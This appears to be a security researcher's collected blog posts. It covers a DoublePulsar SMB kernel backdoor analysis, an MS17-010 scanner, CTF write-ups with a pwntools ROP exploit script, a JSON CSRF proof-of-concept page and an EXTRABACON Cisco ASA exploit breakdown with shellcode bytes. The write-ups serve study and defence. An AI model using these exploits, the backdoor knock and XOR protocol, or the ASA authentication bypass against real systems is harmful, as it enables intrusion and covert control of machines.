    The shellcode, in tl;dr fashion, essentially performs the following:

    • Step 0: Shellcode sorcery to determine if x86 or x64, and branches as such.
    • Step 1: Locates the IDT from the KPCR, and traverses backwards from the first interrupt handler to find ntoskrnl.exe base address (DOS MZ header).
    • Step 2: Reads ntoskrnl.exe's exports directory, and uses hashes (similar to usermode shellcode) to find ExAllocatePool/ExFreePool/ZwQuerySystemInformation functions.
    • Step 3: Invokes ZwQuerySystemInformation() with the enum value SystemModuleInformation, which loads a list of all drivers. It uses this to locate Srv.sys, an SMB driver.
    • Step 4: Switches the SrvTransactionNotImplemented() function pointer located at SrvTransaction2DispatchTable[14] to its own hook function.
    • Step 5: With secondary DoublePulsar payloads (such as inject DLL), the hook function sees if you "knock" correctly and allocates an executable buffer to run your raw shellcode. All other requests are forwarded directly to the original SrvTransactionNotImplemented() function. "Burning" DoublePulsar doesn't completely erase the hook function from memory, just makes it dormant.

    After exploitation, you can see the missing symbol in the SrvTransaction2DispatchTable. There are supposed to be 2 handlers here with the SrvTransactionNotImplemented symbol. This is the DoublePulsar backdoor (array index 14):

    Honestly, you don't usually wake up in the morning and feel like spending time dissecting ~3600 some odd bytes of Ring-0 shellcode, but I felt productive today. Also I was really curious about this payload and didn't see many details about it outside of Countercept's analysis of the DLL injection code. But I was interested in how the initial SMB backdoor is installed, which is what this post is about.

    Zach Harding, Dylan Davis, and I kind of rushed through it in a few hours in our red team lab at RiskSense. There is some interesting setup in the EternalBlue exploit with the IA32_LSTAR syscall MSR (0xc0000082) and a region of the Srv.sys containing FEFEs, but I will instead focus on just the raw DoublePulsar methodology... Much like the EXTRABACON shellcode, this one is crafty and does not simply spawn a shell.

    Detailed Shellcode Analysis

    Inside the Shadow Brokers dump you can find DoublePulsar.exe and EternalBlue.exe. When you use DoublePulsar in FuzzBunch, there is an option to spit its shellcode out to a file. We found out this is a red herring, and that the EternalBlue.exe contained its own payload.

    Step 0: Determine CPU Architecture

    The main payload is quite large because it contains shellcode for both x86 and x64. The first few bytes use opcode trickery to branch to the correct architecture (see my previous article on assembly architecture detection).

    Here is how x86 sees the first few bytes.

    You'll notice that inc eax means the je (jump equal/zero) instruction is not taken. What follows is a call and a pop, which is to get the current instruction pointer.

    And here is how x64 sees it:

    The inc eax byte is instead the REX preamble for a NOP. So the zero flag is still set from the xor eax, eax operation. Since x64 has RIP-relative addressing it doesn't need to get the RIP register.

    The x86 payload is essentially the same thing as the x64 so this post only focuses on x64.

    Since the NOP was a true NOP on x64, I overwrote the 40 90 with cc cc (int 3) using a hex editor. Interrupt 3 is how debuggers set software breakpoints.

    Now when the system is exploited, our attached kernel debugger will automatically break when the shellcode starts executing.

    Step 1: Find ntoskrnl.exe Base Address

    Once the shellcode figures out it is x64 it begins to search for the base of ntoskrnl.exe. This is done with the following stub:

    Fairly straightforward code. In user mode, the GS segment for x64 contains the Thread Information Block (TIB), which holds a pointer to the Process Environment Block (PEB), a struct which contains all kinds of information about the current running process. In kernel mode, this segment instead contains the Kernel Processor Control Region (KPCR), a struct which at offset zero actually contains the current process PEB.

    This code grabs offset 0x38 of the KPCR, which is the "IdtBase" and contains a pointer to an array of KIDTENTRY64 structs. Those familiar with the x86 family will know this is the Interrupt Descriptor Table.

    At offset 4 into the KIDTENTRY64 struct you can get a function pointer to the interrupt handler, which is code defined inside of ntoskrnl.exe. From there it searches backwards in memory in 0x1000 increments (page size) for the .exe DOS MZ header (cmp bx, 0x5a4d).
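
The backwards page walk can be sketched in user mode over an ordinary buffer. The function name and the lower bound parameter are additions for this sketch (the shellcode has no such bound); they only keep the loop from running off the start of the test buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE 0x1000u

/* Round an address inside the image down to its page, then step back one
 * page at a time until a page starts with "MZ". The byte compare is the
 * same check as cmp bx, 0x5a4d on a little-endian machine. */
static const uint8_t *find_image_base(const uint8_t *addr_inside,
                                      const uint8_t *lowest)
{
    uintptr_t p = (uintptr_t)addr_inside & ~(uintptr_t)(PAGE_SIZE - 1);

    while (p >= (uintptr_t)lowest) {
        const uint8_t *page = (const uint8_t *)p;
        if (page[0] == 'M' && page[1] == 'Z')
            return page;
        p -= PAGE_SIZE;
    }
    return NULL;  /* no header found at or above the lower bound */
}
```

This works because PE images are mapped on page boundaries, so the header can only ever sit at the start of a page.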

    Step 2: Locate Necessary Function Pointers

    Once you know where the MZ header of a PE file is, you can peek into defined offsets for the export directory and get the relative virtual address (RVA) of any function you want. Userland shellcode does this all the time, usually to find necessary functions it needs out of ntdll.dll and kernel32.dll. Just like most userland shellcode, this ring 0 shellcode also uses a hashing algorithm instead of hard-coded strings in order to find the necessary functions.
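
For illustration, here is the general shape of hash-based export lookup using the ROR13 hash that is common in user-mode shellcode. This is a swapped-in, well-known algorithm; the hash DoublePulsar actually uses is not shown in this post, and the function names are made up.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Rotate a 32-bit value right by n bits (0 < n < 32). */
static uint32_t ror32(uint32_t v, unsigned n)
{
    return (v >> n) | (v << (32 - n));
}

/* Classic ROR13 name hash: rotate the accumulator, then add the next byte. */
static uint32_t ror13_hash(const char *name)
{
    uint32_t h = 0;
    while (*name != '\0') {
        h = ror32(h, 13);
        h += (uint8_t)*name++;
    }
    return h;
}

/* Walk a table of export names and return the index whose hash matches,
 * or -1 if none does. Real shellcode walks the PE export directory. */
static int find_export(const char *const *names, size_t count, uint32_t wanted)
{
    for (size_t i = 0; i < count; i++) {
        if (ror13_hash(names[i]) == wanted)
            return (int)i;
    }
    return -1;
}
```

The payload then only needs to carry a 4-byte constant per function instead of strings like "ExAllocatePool", which keeps it small and hides its intent from a strings dump.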

    The following functions are found:

    ExAllocatePool can be used to create regions of executable memory, and ExFreePool can clean it up when done. These are important so the shellcode can allocate space for its hooks and other functions. ZwQuerySystemInformation is important in the next step.

    Step 3: Locate Srv.sys SMB Driver

    A feature of ZwQuerySystemInformation is a constant named SystemModuleInformation, with the value 0xb. This gives a list of all loaded drivers in the system.

    The shellcode then searched this list for two different hashes, and it landed on Srv.sys, which is one of the main drivers that SMB runs on.

    The process here is basically equivalent to getting PEB->Ldr in userland, which lets you iterate loaded DLLs. Instead, it was looking for the SMB driver.

    Step 4: Patch the SMB Trans2 Dispatch Table

    Now that the DoublePulsar shellcode has the main SMB driver, it iterates over the .sys PE sections until it gets to the .data section.

    Inside of the .data section is generally global read/write memory, and stored here is the SrvTransaction2DispatchTable, an array of function pointers that handle different SMB tasks.

    The shellcode allocates some memory and copies over the code for its function hook.

    Next the shellcode stores the function pointer for the dispatch named SrvTransactionNotImplemented() (so that it can call it from within the hook code). It then overwrites this member inside SrvTransaction2DispatchTable with the hook.
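
The save-then-overwrite pattern looks roughly like this in portable C. The handler signature, table size, and KNOCK value are all hypothetical; the real handlers take SMB work contexts, and the real table lives in Srv.sys's .data section.

```c
#include <assert.h>
#include <stddef.h>

#define TABLE_SIZE 17    /* arbitrary size for this sketch */
#define HOOK_INDEX 14    /* byte offset 14 * 8 = 0x70 on x64 */
#define KNOCK      0x23  /* made-up "magic" request value */

typedef int (*handler_fn)(int request);

static handler_fn dispatch_table[TABLE_SIZE];
static handler_fn saved_original;

/* Stand-in for SrvTransactionNotImplemented(). */
static int not_implemented(int request)
{
    (void)request;
    return -1;
}

/* The hook handles its own knock and forwards everything else. */
static int hook(int request)
{
    if (request == KNOCK)
        return 0x10;
    return saved_original(request);
}

static void table_init(void)
{
    for (size_t i = 0; i < TABLE_SIZE; i++)
        dispatch_table[i] = not_implemented;
}

/* Remember the original pointer, then swap in the hook. */
static void install_hook(void)
{
    saved_original = dispatch_table[HOOK_INDEX];
    dispatch_table[HOOK_INDEX] = hook;
}
```

Because unrecognized requests still reach the original handler, normal SMB clients see no change in behavior after the swap.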

    That's it. The backdoor is complete. Now it just returns up its own call stack and does some small cleanup chores.

    Step 5: Send "Knock" and Raw Shellcode

    Now when DoublePulsar sends its specific "knock" requests (which are seen as invalid SMB calls), the dispatch table calls the hooked fake SrvTransactionNotImplemented() function. Odd behavior is observed: normally the SMB response MultiplexID must match the SMB request MultiplexID, but instead it is incremented by a delta, which serves as a status code.

    Operations, which do not have proper dissectors in Wireshark, are hidden in plain sight via steganography.

    The status codes (via MultiplexID delta) are:

    • 0x10 = success
    • 0x20 = invalid parameters
    • 0x30 = allocation failure
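
A client could decode the status like this. The function name and the returned strings are just for illustration, and treating a delta of zero as "MID unchanged" is an assumption based on normal SMB behavior.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Map the difference between response and request MultiplexID to the
 * status codes listed above. Arithmetic is 16-bit, so it wraps safely. */
static const char *dp_status(uint16_t request_mid, uint16_t response_mid)
{
    uint16_t delta = (uint16_t)(response_mid - request_mid);

    switch (delta) {
    case 0x00: return "MID unchanged";
    case 0x10: return "success";
    case 0x20: return "invalid parameters";
    case 0x30: return "allocation failure";
    default:   return "unknown";
    }
}
```

So a ping sent with MultiplexID 0x41 that comes back as 0x51 decodes to "success".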

    The opcode list is as follows:

    • 0x23 = ping
    • 0xc8 = exec
    • 0x77 = kill

    You can tell which opcode was called by using the following algorithm:

    t = SMB.Trans2.Timeout
    op = (t) + (t >> 8) + (t >> 16) + (t >> 24);

    Conversely, you can make the packet using this algorithm, where k is randomly generated:

    op = 0x23
    k = 0xdeadbeef
    t = 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
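
Both directions translate directly to C. The function names are hypothetical, and truncating the byte sum to 8 bits in the decoder is my reading of the algorithm, since the opcodes are single bytes.

```c
#include <assert.h>
#include <stdint.h>

/* Decode: the opcode is the low byte of the sum of the timeout's bytes. */
static uint8_t dp_opcode_from_timeout(uint32_t t)
{
    return (uint8_t)(t + (t >> 8) + (t >> 16) + (t >> 24));
}

/* Encode: keep bytes 1 and 2 of the random value k, clear byte 3, and
 * choose byte 0 so that the byte sum comes out to op. */
static uint32_t dp_timeout_for_opcode(uint8_t op, uint32_t k)
{
    uint32_t b2 = (k & 0xffff00u) >> 16;
    uint32_t b1 = (k & 0x00ff00u) >> 8;
    return (0xffu & (op - b2 - b1)) | (k & 0xffff00u);
}
```

With op = 0x23 and k = 0xdeadbeef the encoder produces 0x00adbeb8, and 0xb8 + 0xbe + 0xad wraps around to 0x23.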

    Sending a ping opcode in a Trans2 SESSION_SETUP request will yield a response that holds part of a XOR key that needs to be calculated for exec requests.

    The "XOR key" algorithm is:

    s = SMB.Signature1
    x = 2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))
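
In C with fixed-width types, the key calculation can be sketched as below, reading the expression as 2 * s XORed with the byte-swapped value of s and truncated to 32 bits. That reading, and the function names, are assumptions for this sketch.

```c
#include <assert.h>
#include <stdint.h>

/* Reverse the byte order of a 32-bit value. */
static uint32_t bswap32(uint32_t s)
{
    return (s << 24) |
           ((s & 0x0000ff00u) << 8) |
           ((s & 0x00ff0000u) >> 8) |
           (s >> 24);
}

/* XOR key derived from the signature field of the ping response.
 * uint32_t arithmetic wraps, so the result is already 32 bits wide. */
static uint32_t dp_xor_key(uint32_t s)
{
    return (2u * s) ^ bswap32(s);
}
```

In a language with arbitrary-precision integers, such as Python, the result would need an explicit & 0xffffffff to match.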

    More shellcode can be sent with a Trans2 SESSION_SETUP request and exec opcode. The shellcode is sent in the "data payload" part of the packet 4096 bytes at a time, using the XOR key as a basic stream cipher. The backdoor will allocate an executable region of memory, decrypt and copy over the shellcode, and run it. The Inject DLL payload is simply some DLL loading shellcode prepended to the DLL you actually want to inject.

    We can see the hook is installed at SrvTransaction2DispatchTable+0x70 (112/8 = index 14):

    And of course the full disassembly listing.

    Conclusion

    There you have it, a highly sophisticated, multi-architecture SMB backdoor. The world probably did not need a remote Windows kernel payload this advanced being spammed across the Internet. It's a unique payload, because you can infect a system, lay low for a little bit, and come back later when you want to do something more intrusive. It also finds a nice place in the system to hide out and not alert built-in defenses like PatchGuard. It is unclear if newer versions of PatchGuard, such as those in Windows 10, already detect this hook. If not, we can expect such a check to be added.

    Usually we only get to see kernel shellcode in local exploits, as it swaps process tokens in order to privilege escalate. However, Microsoft does many networking things in the kernel, such as Srv.sys and HTTP.sys. The techniques demonstrated are in many ways completely analogous to how usermode shellcode operates during remote exploits.

    If/when this gets ported over to Metasploit, I would probably not copy this verbatim, and rather skip the backdoor idea. It isn't the most secure thing to do, as it's not a big secret anymore and anyone else can come along and use your backdoor.

    Here's what can be done instead:

    1. Obtain ntoskrnl.exe address in the same fashion as DoublePulsar, and read export directory for necessary functions to perform the next operations.
    2. Spawn a hidden process (such as notepad.exe).
    3. Queue an APC with Meterpreter payload.
    4. Resume process, and exit the kernel cleanly.

    Every major malware family, from botnets to ransomware to banking spyware, will eventually add the exploits in the FuzzBunch toolkit to their arsenal. This payload is simply a mechanism to load more malware with full system privileges. It does not open new ports, or have any real encryption or other features to prevent others from taking advantage of the same hole, making the attribution game for digital forensic investigators even more difficult. This is a jewel compared to the scraps that were given to Stuxnet. It comes in a more dangerous era than the days of Conficker. Given the persistence of the missing MS08-067 patch, we could be in store for a decade of breaches emanating from MS17-010 exploits. It is the perfect storm for one of the most damaging malware infections in computing history.

    MS17-010 (SMB RCE) Metasploit Scanner Detection Module

    Update April 21, 2017 - There is an active pull request at Metasploit master which adds DoublePulsar infection detection to this module.

    During the first Shadow Brokers leak, my colleagues at RiskSense and I reverse engineered and improved the EXTRABACON exploit, which I wrote a feature about for PenTest Magazine. Last Friday, Shadow Brokers leaked FuzzBunch, a Metasploit-like attack framework that hosts a number of Windows exploits not previously seen. Microsoft's official response says these exploits were fixed up in MS17-010, released in mid-March.

    Yet again I find myself tangled up in the latest Shadow Brokers leak. I actually wrote a scanner to detect MS17-010 about 2-3 weeks prior to the leak, judging by the date on my initial pull request to Metasploit master. William Vu of Rapid7 (whom I coincidentally met in person on the day of the leak) added some improvements as well. It was pulled into the master branch on the day of the leak. This module can be used to scan a network range (RHOSTS) and detect whether the patch is missing.

    Module Information Page
    https://rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010

    Module Source Code
    https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

    My scanner module connects to the IPC$ tree and attempts a PeekNamedPipe transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. After the patch, Win10 returns "STATUS_ACCESS_DENIED" and other Windows versions "STATUS_INVALID_HANDLE". In case none of these are detected, the module says it was not able to detect the patch level (I haven't seen this in practice).
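    The decision logic described above can be sketched in a few lines of Python. This is only an illustration of the status-code mapping, not the module's actual Ruby code; `classify_ms17_010` is a hypothetical helper name, and the numeric values are the standard NTSTATUS constants for the three status names mentioned.

```python
# NTSTATUS values for the three responses named in the text.
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
STATUS_ACCESS_DENIED = 0xC0000022
STATUS_INVALID_HANDLE = 0xC0000008


def classify_ms17_010(nt_status):
    """Map the PeekNamedPipe (FID 0) response status to a verdict.

    Hypothetical helper for illustration; not part of Metasploit.
    """
    if nt_status == STATUS_INSUFF_SERVER_RESOURCES:
        return "vulnerable"   # the MS17-010 patch is missing
    if nt_status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "patched"      # Win10 / other Windows versions after the patch
    return "unknown"          # patch level could not be determined


print(classify_ms17_010(0xC0000205))
```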

    IPC$ is the "InterProcess Communication" share, which generally does not require valid SMB credentials in default server configurations. Thus this module can usually be run as an unauthenticated scan, as it can log on as the user "\" and connect to IPC$.

    This is the most important patch for Windows in almost a decade, as it fixes several remote vulnerabilities for which there are now public exploits (EternalBlue, EternalRomance, and EternalSynergy).

    These are highly complex exploits, but the FuzzBunch framework essentially makes the process as easy as point and shoot. EternalRomance does a ridiculous amount of "grooming", aka remote heap feng shui. In the case of EternalBlue, it spawns numerous threads and simultaneously exploits SMBv1 and SMBv2, and seems to talk Cairo, an undocumented SMB LanMan alternative (only known because of the NT4 source code leaks). I haven't gotten around to looking at EternalSynergy yet.

    I am curious to learn more, but have too many side projects at the moment to spend my full efforts investigating further. And unlike EXTRABACON, I don't see any "obvious" improvements, other than that I would like to see an open source version.

    Overflow Exploit Pattern Generator - Online Tool

    Metasploit's pattern generator is a great tool, but Ruby's startup time is abysmally slow. Out of frustration, I made this in-browser online pattern generator written in JavaScript.

    Generate Overflow Pattern


    Find Overflow Offset

    For the unfamiliar, this tool will generate a non-repeating pattern. You drop it into your exploit proof of concept. You crash the program, and see what the value of your instruction pointer register is. You type that value in to find the offset of how big your buffer should be overflowed before you hijack execution.
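    For readers who want to see the idea offline, here is a minimal Python sketch of both halves of the tool. It assumes the familiar Metasploit-style alphabet (uppercase, lowercase, digit) and a 32-bit little-endian register; the function names are my own and this is not the JavaScript behind the page.

```python
import string
import struct


def pattern_create(length):
    """Return the first `length` characters of the pattern Aa0Aa1Aa2..."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    # Requests longer than 26*26*10*3 characters are truncated here.
    return "".join(out)[:length]


def pattern_offset(value, length=8192):
    """Locate a 32-bit register value (little-endian) inside the pattern."""
    needle = struct.pack("<I", value).decode("latin-1")
    return pattern_create(length).find(needle)  # -1 when not present


print(pattern_create(12))
print(pattern_offset(0x41326141))
```

    If the instruction pointer reads 0x41326141 after the crash, the offset returned is the number of filler bytes needed before the value that overwrites the return address.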

    See also: Obfuscated String/Shellcode Generator - Online Tool

    Hack the Vote CTF "The Wall" Solution

    RPISEC ran a capture the flag called Hack the Vote 2016 that was themed after the election. In the competition was "The Wall" challenge by itszn.

    The Wall challenge clue:

    The Trump campaign is running a trial of The Wall plan. They want to prove that no illegal immigrants could get past it. If that goes as planned, us here at the DNC will have a hard time swinging some votes in the southern boarder states. We need you to hack system and get past the wall. I heard they have put extra protections into place, but we think you can still do it. If you do get into America, there should be a flag somewhere in the midwest that you can have. You will be US "citizen" after all.

    The challenge link was a tarball with a bunch of directories. Inside the /bin/ folder was an x64 ELF called "minetest", which is a Minecraft clone. I was pleased to see this was a video game challenge, having a fair amount of infamy for hacking online games in my past lives.

    When you run the game, you log onto a server and are greeted with Trump's wall. It's yuuuge, spanning infinitely across the horizontal plane.

    So the goal must be to get around this wall and into America. I tried a few naive approaches, as I just wanted to get something like a simple warp or run-through-wall type of cheat running, but alas there was an anti-cheat built into the game.

    No problem, it wouldn't be the first time I've had to defeat an anti-cheat system. I started reversing a function called Client::handleCommand_CheatChallange() (sic):

    I deduced this function was reading /proc/self/maps and running a SHA1 function on it. At first I was going to just overwrite this function to make it give the expected SHA1, but then I started backing up and found this function was only called when you first joined the server. So all that was needed to bypass the anti-cheat was to delay load however I planned to cheat.

    Poking around the game and binary some more, I noticed there was a "fly" mode, that my client didn't have the privilege from the server for:

    Well, my client still has the code for flying even if the server says I don't have the privilege. I found a function called Client::checkLocalPrivilege(). The function takes a C++ std::string of a privilege (such as fly) and returns a bool.

    Yea, this guy's doing way too much work for me. Time to patch it with the following assembly:

    inc eax   ; ff c0
    ret ; c3
    nop ; 90

    This will make the function always return true when my client checks if I have access to a certain privilege. After logging into the server, I attached to my client with GDB and patched my new assembly into the privilege check function:

    Now that I could fly, I noticed the wall also grew infinitely vertical. Fortunately, from way up high I was able to glitch through the wall.

    I made it!

    I wandered through the desert for 40 days and 40 night cycles.

    No really, I wandered a long time. I should also mention disabling the privilege checks gives access to a speed hack, but it was a little glitchy and the server kept warping me backwards.

    I was starting to get worried, when all of a sudden I saw beautiful Old Glory off in the distance.

    Hack the Vote CTF "IRS" Solution

    RPISEC ran a capture the flag called Hack the Vote 2016 that was themed after the election. In the competition was the "IRS" challenge by pigeon.

    IRS challenge clue:

    Good day fellow Americans. In the interest of making filing your tax returns as easy and painless as possible, we've created this nifty lil' program to better serve you! Simply enter your name and file away! And don't you worry, everyone's file is password protected ;)

    We get a pwnable x86 ELF Linux binary with a non-executable stack. There are also details for a server to connect to with ncat in order to exploit it.

    The program contains about 10 functions that are relatively straightforward about what they do just going off the strings. Exploring the program, there is a blatant address leak when there is an attempt to create more than 5 total users in the system.

    This %p is given to puts(). It dereferences to a pointer address that is the start of an array of structs which hold IRS tax return data. Here is the initialization code for Trump's struct:

    Note that Trump's password is "not_the_flag" here, but on the server it will be the flag.

    Preceding Trump's struct construction is a call to malloc() with 108 bytes, and throughout the program we only see 4 distinct fields. So the completed struct most likely is:


    struct IRS_Data
    {
        char name[50];
        char pass[50];
        int32_t income;
        int32_t deductibles;
    };
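    As a quick sanity check on the guessed layout, Python's struct module can confirm that these four fields add up to the 108 bytes passed to malloc(). This is a sketch under the assumption that the fields are packed in this order with no padding; the name and the numeric values below are placeholders.

```python
import struct

# Assumed layout: two 50-byte strings followed by two little-endian int32s.
IRS_DATA = struct.Struct("<50s50sii")

# Placeholder record; only the password string comes from the binary.
record = IRS_DATA.pack(b"Trump", b"not_the_flag", 0, 0)
name, password, income, deductibles = IRS_DATA.unpack(record)

print(IRS_DATA.size)
print(password.rstrip(b"\x00"))
```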

    In a function which I named edit_tax_return(), there is a call to gets(). This is a highly vulnerable C function that writes to a buffer from stdin with no constraints on length, and thus should probably never be used.

    The exploitation process can be pretty simple if you take advantage of other functions present in the binary.

    1. Create enough users to leak the user array pointer
    2. Overflow the gets() in edit_tax_return() with a ROP chain
    3. ROP #1 calls view_tax_return() with the leaked pointer and index 0 (a.k.a. Trump)
    4. ROP #2 cleanly returns back to the start of main()

    #!/usr/bin/env python2
    from pwn import *

    #r = remote("irs.pwn.republican", 4127)
    r = process('./irs.4ded.3360.elf')

    r.send("1\n"*21) # create a bunch of fake users
    r.recvuntil("0x") # get the leaked %p address

    database_addr = int(r.recvline().strip(), 16)
    log.success("Got leaked address %08x" % database_addr)

    r.send("3\n"+"1\n"*4) # edit a known user record

    overflow = "A"*25
    overflow += p32(0x0804892C) # print_tax_return(pDB, i)
    overflow += p32(0x08048a39) # main(void), safe return
    overflow += p32(database_addr) # pDB
    overflow += p32(0x00000000) # i

    r.send(overflow + "\n") # 08048911 call gets

    r.recvuntil("Password: ") # print_tax_return() Trump password

    flag = r.recvline().split(" ")[0]
    log.success(flag)
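    The overflow buffer in that script is just a hand-built cdecl call frame. The following Python 3 sketch rebuilds it with the standard library only, so the layout is easier to see; the two code addresses are taken from the exploit above, while `build_overflow` and the example leaked address are hypothetical.

```python
import struct

PRINT_TAX_RETURN = 0x0804892C  # from the exploit above
MAIN = 0x08048A39              # from the exploit above


def build_overflow(database_addr, index=0, padding=25):
    """Lay out filler, the hijacked return address, then a fake call frame."""
    return b"A" * padding + struct.pack(
        "<IIII",
        PRINT_TAX_RETURN,  # overwrites the saved return address
        MAIN,              # where print_tax_return() will return to
        database_addr,     # first argument: pDB
        index,             # second argument: i (0 is Trump)
    )


payload = build_overflow(0x0804B0A0)  # hypothetical leaked pointer
print(payload.hex())
```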

    CSRF Attack for JSON-encoded Endpoints

    Sometimes you see a possible Cross-Site Request Forgery (CSRF) attack against JSON endpoints, where data is a JSON blob instead of x-www-form-urlencoded data.

    Here is a PoC that will send a JSON CSRF.


    <html>
        <form action="http://127.0.0.1/json" method="post"
            enctype="text/plain" name="jsoncsrf">
            <input
                name='{"json":{"nested":"obj"},"list":["0","1"]}'
                type='hidden'>
        </form>
        <script>
            document.jsoncsrf.submit()
        </script>
    </html>

    You can use any JSON including nested objects, lists, etc.

    The previous example adds a trailing equal sign =, which will break some parsers. You can get around it with:


    <input name='{"json":"data","extra' value='":"stuff"}'
    type='hidden'>

    Which will give the following JSON:


    {"json":"data","extra=":"stuff"}
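    To see why the second form parses while the first may not, the request bodies can be simulated offline. This sketch assumes the browser serializes a text/plain form as name=value followed by CRLF, and uses Python's json module as a stand-in for a strict server-side parser; `text_plain_body` is a hypothetical helper.

```python
import json


def text_plain_body(fields):
    """Serialize form fields as enctype="text/plain" does: name=value CRLF."""
    return "".join("%s=%s\r\n" % (name, value) for name, value in fields)


# First PoC: the whole JSON is the field name and the value is empty.
naive = text_plain_body([('{"json":{"nested":"obj"},"list":["0","1"]}', "")])

# Second PoC: the "=" lands inside a throwaway JSON key.
padded = text_plain_body([('{"json":"data","extra', '":"stuff"}')])

print(repr(naive))
print(json.loads(padded))
```

    A strict parser rejects the first body because of the stray = after the closing brace, while the second body is valid JSON followed only by whitespace.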

    Reverse Engineering Cisco ASA for EXTRABACON Offsets

    Update Sept. 24: auxiliary/admin/cisco/cisco_asa_extrabacon is now in the Metasploit master repo. There is support for the original ExtraBacon leak and ~20 other newer versions.

    Update Sept. 22: Check this GitHub repo for ExtraBacon 2.0, improved Python code, a Lina offset finder script, support for a few more 9.x versions, and a Metasploit module.

    Background

    On August 13, 2016 a mysterious Twitter account (@shadowbrokerss) appeared, tweeting a PasteBin link to numerous news organizations. The link described the process for an auction to unlock an encrypted file that claimed to contain hacking tools belonging to the Equation Group. Dubbed last year by Kaspersky Lab, Equation Group are sophisticated malware authors believed to be part of the Office of Tailored Access Operations (TAO), a cyber-warfare intelligence-gathering unit of the National Security Agency (NSA). As a show of good faith, a second encrypted file and corresponding password were released, with tools containing numerous exploits and even zero-day vulnerabilities.

    One of the zero-day vulnerabilities released was a remote code execution in the Cisco Adaptive Security Appliance (ASA) device. The Equation Group's exploit for this was named EXTRABACON. Cisco ASAs are commonly used as the primary firewall for many organizations, so the EXTRABACON exploit release raised many eyebrows.

    At RiskSense we had spare ASAs lying around in our red team lab, and my colleague Zachary Harding was extremely interested in exploiting this vulnerability. I told him if he got the ASAs properly configured for remote debugging I would help in the exploitation process. Of course, the fact that there are virtually no exploit mitigations (i.e. ASLR, stack canaries, et al) on Cisco ASAs may have weighed in on my willingness to help. He configured two ASAs, one containing version 8.4(3) (which had EXTRABACON exploit code), and version 9.2(3) which we would target to write new code.

    This blog post will explain the methodology for the following submissions to exploit-db.com:

    There is detailed information about how to support other versions of Cisco ASA for the exploit. Only a few versions of 8.x were in the exploit code, however the vulnerability affected all versions of ASA, including all of 8.x and 9.x. This post also contains information about how we were able to decrease the Equation Group shellcode from 2 stages containing more than 200 bytes to 1 stage of 69 bytes.

    Understanding the Exploit

    Before we can begin porting the exploit to a new version, or improving the shellcode, we first need to know how the exploit works.

    This remote exploit is your standard stack buffer overflow, caused by sending a crafted SNMP packet to the ASA. From the internal network, it's pretty much a guarantee with the default configuration. We were also able to confirm the attack can originate from the external network in some setups.

    Hijacking Execution

    The first step in exploiting a 32-bit x86 buffer overflow is to control the EIP (instruction pointer) register. In x86, a function CALL pushes the current EIP location to the stack, and a RET pops that value and jumps to it. Since we overflow the stack, we can change the return address to any location we want.

    In the shellcode_asa843.py file, the first interesting thing to see is:


    my_ret_addr_len = 4
    my_ret_addr_byte = "\xc8\x26\xa0\x09"
    my_ret_addr_snmp = "200.38.160.9"

    This is an offset in 8.4(3) to 0x09a026c8. As this was a classic stack buffer overflow exploit, my gut told me this was where we would overwrite the RET address, and that there would be a JMP ESP (jump to stack pointer) here. Sometimes your gut is right:

    The vulnerable file is called "lina". And it's an ELF file; who needs IDA when you can use objdump?

    Stage 1: "Finder"

    The Equation Group shellcode is actually 3 stages. After we JMP ESP, we find our EIP in the "finder" shellcode.


    finder_len = 9
    finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90"
    finder_snmp = "139.124.36.20.139.7.255.224.144"

    This code finds some pointer on the stack and jumps to it. The pointer contains the second stage.

    We didn't do much investigating here as it was the same static offsets for every version. Our improved shellcode also uses this first stage.
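    The paired _byte and _snmp variables in these excerpts are two spellings of the same data: the raw bytes, and the same bytes written as dotted decimal, presumably because they travel inside an SNMP OID. A small Python sketch makes the relationship explicit; `to_snmp` is a hypothetical helper, not a function from the leaked code.

```python
import struct


def to_snmp(raw):
    """Render raw bytes as dotted decimal, one number per byte."""
    return ".".join(str(b) for b in raw)


ret_addr = struct.pack("<I", 0x09A026C8)      # little-endian return address
finder = bytes.fromhex("8b7c24148b07ffe090")  # same bytes as finder_byte

print(to_snmp(ret_addr))  # 200.38.160.9
print(to_snmp(finder))    # 139.124.36.20.139.7.255.224.144
```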

    Stage 2: "Preamble"

    Observing the main Python source code, we can see how the second stage is made:


    wrapper = sc.preamble_snmp
    if self.params.msg:
        wrapper += "." + sc.successmsg_snmp
    wrapper += "." + sc.launcher_snmp
    wrapper += "." + sc.postscript_snmp

    Ignoring successmsg_snmp (as the script --help text says DO NOT USE), the following shellcode is built:

    It seems like a lot is going on here, but it's pretty simple.

    1. A "safe" return address is XORed by 0xa5a5a5a5
      1. unnecessary, yet this type of XOR is everywhere. The shellcode can contain null bytes so we don't need a mask
    2. Registers smashed by the stack overflow are fixed, including the frame base pointer (EBP)
    3. The fixed registers are saved (PUSHA = push all)
    4. A pointer to the third stage "payload" (to be discussed soon) is found on the stack
      • This offset gave us trouble. Luckily our improved shellcode doesn't need it!
    5. Payload is called, and returns
    6. The saved registers are restored (POPA = pop all)
    7. The shellcode returns execution to the "safe" location, as if nothing happened

    I'm guessing the safe return address is where the buffer overflow would have returned if not exploited, but we haven't actually investigated the root cause of the vulnerability, just how the exploit works. This is probably the most elusive offset we will need to find, and IDA does not recognize this part of the code section as part of a function.

    If we follow the function that is called before our safe return, we can see why there are quite a few registers that need to be cleaned up.

    These registers also get smashed by our overflow. If we don't fix the register values, the program will crash. Luckily the cleanup shellcode can be pretty static, with only the EBP register changing a little bit based on how much stack space is used.

    Stage 3: "Payload"

    The third stage is where the magic finally happens. Normally shellcode, as it is aptly named, spawns a shell. But the Equation Group has another trick up its sleeve. Instead, we patch two functions, which we called "pmcheck()" and "admauth()", to always return true. With these two functions patched, we can log onto the ASA admin account without knowing the correct password.

